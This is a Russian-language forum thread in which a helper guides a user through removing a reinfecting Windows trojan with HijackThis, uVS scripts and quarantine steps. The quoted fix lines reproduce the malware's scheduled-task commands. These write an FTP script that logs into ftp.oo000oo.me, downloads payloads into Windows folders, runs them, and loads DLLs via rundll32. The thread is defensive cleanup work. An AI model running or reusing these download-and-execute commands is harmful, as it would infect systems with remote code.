Как избавиться от lsmosee.exe , mysa1,2,3 и ok.

[Михайло Ломоносов]

Здравствуйте , столкнулся с таким вирусом , который создаёт файлы lsmosee.exe(C:\Windows\Help\lsmosee.exe)
Mysa 1(C:\Windows\System32\Tasks\Mysa1)
Mysa 2(C:\Windows\System32\Tasks\Mysa2)
Mysa 3(C:\Windows\System32\Tasks\Mysa3)
ok(C:\Windows\System32\Tasks\ok)
А так же был файл item.dat в папке debug(C:\Windows\debug\item.dat) , но его теперь нету.
Пробовал удалить - ничего не получаются восстанавливаются.
Раньше были ещё файлы lsmos.exe и lsmose.exe(Как-то избавился от них)
Прошу помочь.

Сообщение от модератора Soft

Текст отформатирован.

[Soft]

«Порядок оформления запроса о помощи»

[Михайло Ломоносов]

«Порядок оформления запроса о помощи»

CollectionLog-2017.08.14-19.31.zip

[regist]

1) - Перетащите лог Check_Browsers_LNK.log на утилиту ClearLNK. Отчёт о работе прикрепите.
 
2) "Пофиксите" в HijackThis (некоторые строки могут отсутствовать):

O17 - HKLM\System\CSS\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 156.154.70.1
O17 - HKLM\System\CSS\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 156.154.71.1
O17 - HKLM\System\CSS\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 208.67.220.220
O17 - HKLM\System\CSS\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 208.67.222.222
O17 - HKLM\System\CSS\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 4.2.2.1
O17 - HKLM\System\CSS\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 4.2.2.2
O17 - HKLM\System\CSS\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 8.20.247.20
O17 - HKLM\System\CSS\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 8.26.56.26
O17 - HKLM\System\CSS\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 8.8.4.4
O17 - HKLM\System\CSS\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 8.8.8.8
O17 - HKLM\System\CSS\Services\Tcpip\..\{EBD003E3-4905-445A-886B-73C6D38AFC4E}: NameServer = 8.8.4.4
O17 - HKLM\System\CSS\Services\Tcpip\..\{EBD003E3-4905-445A-886B-73C6D38AFC4E}: NameServer = 8.8.8.8
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 156.154.70.1
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 156.154.71.1
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 208.67.220.220
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 208.67.222.222
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 4.2.2.1
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 4.2.2.2
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 8.20.247.20
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 8.26.56.26
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 8.8.4.4
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 8.8.8.8
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{EBD003E3-4905-445A-886B-73C6D38AFC4E}: NameServer = 8.8.4.4
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{EBD003E3-4905-445A-886B-73C6D38AFC4E}: NameServer = 8.8.8.8
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 156.154.70.1
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 156.154.71.1
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 208.67.220.220
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 208.67.222.222
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 4.2.2.1
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 4.2.2.2
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 8.20.247.20
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 8.26.56.26
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 8.8.4.4
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9C6D51C6-6C8D-455B-82BC-F90D93934EB8}: NameServer = 8.8.8.8
O21 - ShellIconOverlayIdentifiers:     YndCase0Sync - {63D48440-63AB-44D0-B323-4731DFCDE9E9} - (no file)
O21 - ShellIconOverlayIdentifiers:     YndCase1Modified - {7E7DC279-E6BE-4D57-9DEC-14FA0339DBC0} - (no file)
O21 - ShellIconOverlayIdentifiers:     YndCase2Error - {FB2FE984-05F5-4512-9D9B-69D3DE61F6D9} - (no file)
O21 - ShellIconOverlayIdentifiers:     YndCase3Shared - {AF8D197E-7022-4c3d-BD88-68AD35C9C169} - (no file)
O22 - Task (Ready): Red Giant Link - C:\Program Files\Red Giant Link\Common\Red Giant Link.exe --silent (file missing)
O22 - Task (Ready): SMW_UpdateTask_Time_333132323739303030352d3437415a556c2a3223346c41 - C:\Program Files\Common Files\Noobzo\GNUpdate\wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 (file missing)

 
Если после фикса вдруг пропадёт интернет, то пропишите настройки DNS рекомендованные провайдером.
 
3)  - Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.

4) Повторите логи по правилам.

Изменено 14 августа, 2017 пользователем regist

[Михайло Ломоносов]

Всё сделал.
Заметил , что опять появился файл lsmos.exe (загрузился в процессы и жутко висло , я завершил этот процесс) C:\Windows\System32\lsmos.exe
Не знаю какую ссылку нужно было вставить , но поставлю обе.
1. https://virusinfo.info/virusdetector/report.php?md5=317AA06C14EE025837AB59B348C42535
2. https://virusinfo.info/showthread.php?t=214639
 

Check_Browsers_LNK.log

CollectionLog-2017.08.14-23.16.zip

[regist]

"Пофиксите" в HijackThis:

O4 - HKCU\..\Run: [GameCenterMailRu] C:\Users\Иван\AppData\Local\Mail.Ru\GameCenter\GameCenter@Mail.Ru.exe -autostart (file missing)
O4 - MSConfig\startupreg: [TrojanScanner] C:\Program Files\Trojan Remover\Trjscan.exe /boot (file missing) (HKLM) (2017/08/14)
O22 - Task (Ready): Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task (Ready): Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.oo000oo.me>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O22 - Task (Running): Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task (Running): ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa

• Скачайте Universal Virus Sniffer (uVS)
• Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
• Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе.
  

  !!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip, то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.

• Дождитесь окончания работы программы и прикрепите лог к посту в теме.
  

  !!! Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите "Да".

• Подробнее читайте в руководстве Как подготовить лог UVS.

Изменено 14 августа, 2017 пользователем regist

[Михайло Ломоносов]

В HiJackThis.exe нету следующих строк.
(В папке C:\Windows\System32\Tasks их тоже нету) 

O22 - Task (Ready): Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task (Ready): Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.oo000oo.me>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O22 - Task (Running): Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task (Running): ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa

Universal Virus Sniffer готово.

ИВАН-ПК_2017-08-15_01-24-59.7z

[regist]

В HiJackThis.exe нету следующих строк.

Надо в новой версии фиксить из папки в HijackThis из папки ..\AutoLogger\HiJackThis, а в не допотопной.

• Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
• Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
• Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:

  ;uVS v4.0.9 [http://dsrt.dyndns.org]
  ;Target OS: NTv6.1
  v400c
  BREG
  deltmp
  ;---------command-block---------
  delref WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
  delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.31.5\PSMACHINE.DLL
  delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.3\PSMACHINE.DLL
  delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.32.7\PSMACHINE.DLL
  delref %SystemDrive%\USERS\ИВАН\APPDATA\LOCAL\MAIL.RU\GAMECENTER\NPDETECTOR.DLL
  delref D:\NVSETUP.EXE
  delref %SystemDrive%\USERS\ИВАН\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\NEHAPOFAKGHLJOPFEGJOGPGPELJKHJJN\8.22.5_0\ПОИСК И СТАРТОВАЯ — ЯНДЕКС
  delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\EXTENSIONS\{972CE4C6-7E08-4474-A285-3208198CE6FD}.XPI
  delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\FEATURES\AUSHELPER@MOZILLA.ORG.XPI
  delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\FEATURES\E10SROLLOUT@MOZILLA.ORG.XPI
  delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\FEATURES\FIREFOX@GETPOCKET.COM.XPI
  delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\FEATURES\WEBCOMPAT@MOZILLA.ORG.XPI
  apply
  
  restart
  
  
  

• В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
• Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер будет перезагружен.
• Подробнее читайте в этом руководстве.

Изменено 14 августа, 2017 пользователем regist

[Михайло Ломоносов]

На счёт HiJackThis , я скачал новую версию и ничего нового там не увидел , те же самые записи.
Скрипт выполнил , файл прикреплён.скриншот:

 

2017-08-15_02-19-13_log.txt

Изменено 14 августа, 2017 пользователем Soft
спрятал скрин под спойлер

[regist]

 

 

На счёт HiJackThis , я скачал новую версию

надо не качать, а использовать из указанной папки в Автлогере. Это самая свежая не тестовая версия.

 

 

Что с проблемой?

 

Сделайте свежий образ автозапуска.

[Михайло Ломоносов]

На данный момент нету таких файлов , как Mysa1 , Mysa2 , Mysa3 и ok в папке C:\Windows\System32\Tasks.
Но остались 2 файла "exe" , lsmos.exe(C:\Windows\System32\lsmos.exe) и lsmosee.exe(C:\Windows\Help\lsmosee.exe).

ИВАН-ПК_2017-08-15_02-50-10.7z

[regist]

Но остались 2 файла "exe" , lsmos.exe(C:\Windows\System32\lsmos.exe) и lsmosee.exe(C:\Windows\Help\lsmosee.exe).

Вы проверяете их наличие? Их процессы снова запускаются? Если да, то не убивайте их. А то как следствие в логе его не вижу и удалить не могу.

 

Попробуем, может так в лог добавятся

 

 

• Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО
• .Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
• Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:

  ;uVS v4.0.5 [http://dsrt.dyndns.org]
  v400c
  
  adddir  %SystemRoot%\
  crimg

• В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
• Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы.
• После этого в папке с программой будет создан образ автозапуска название, которого имеет формат "имя_компьютера_дата_сканирования". Прикрепите этот образ к следующему сообщению

• !!! Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите "Да".

Изменено 15 августа, 2017 пользователем regist

[Михайло Ломоносов]

lsmos.exe и lsmosee.exe в процессах не появляются , но эти файлы остались в папках.
На virustotal загружал эти файлы и результат не радует.
Вот скрипт и лог uVS.
 

ИВАН-ПК_2017-08-15_19-30-30.7z

2017-08-15_20-12-53_log.txt

[regist]

1. [*]Закройте все программы,

временно выгрузите антивирус, файрволл и прочее защитное ПО. [*]Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем". [*]Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:

;uVS v4.0.9 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
BREG
;---------command-block---------
bl 03339D6F7BF0117E64ACCC09E3C5F038 264136
zoo %SystemRoot%\HELP\LSMOSEE.EXE
delall %SystemRoot%\HELP\LSMOSEE.EXE
bl FE04395C95CDD102AEABBF6B915C1A5E 4165576
zoo %Sys32%\LSMOS.EXE
delall %Sys32%\LSMOS.EXE
delref E:\STARTME.EXE
apply

czoo
restart

[*]В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..." [*]Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен. [*]После выполнения скрипта зайдите в папку, где распакована утилита uVS найдите архив, имя которого соответствует дате и времени запуска скрипта с префиксом ZOO_ (например: ZOO_2013-06-30_22-04-27.7z)

Если архив отсутствует, то

заархивруйте папку ZOO

с паролем

virus

.

[*]Полученный архив отправьте с помощью этой формы или (если размер архива превышает 8 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

 

и для надежности сделайте ещё

 

Скачайте Malwarebytes' Anti-Malware. Установите.
На вкладке "Параметры" - "Личный кабинет" ("Settings" - "My Account") нажмите кнопку "Деактивировать ознакомительную Premium-версию".
На вкладке "Проверка" - "Полная проверка" нажмите кнопку "Начать проверку". Дождитесь окончания проверки.
Самостоятельно ничего не удаляйте!!!
Нажмите кнопку "Сохранить результат - Текстовый файл (*.txt)". Имя сохраняемому файлу дайте любое, например, "scan".
Отчёт прикрепите к сообщению.
Подробнее читайте в руководстве.


 

[Михайло Ломоносов]

Файл с префиксом ZOO переименовал в quarantine.zip и отправил.
Вот scan.txt от Malwarebytes.

scan.txt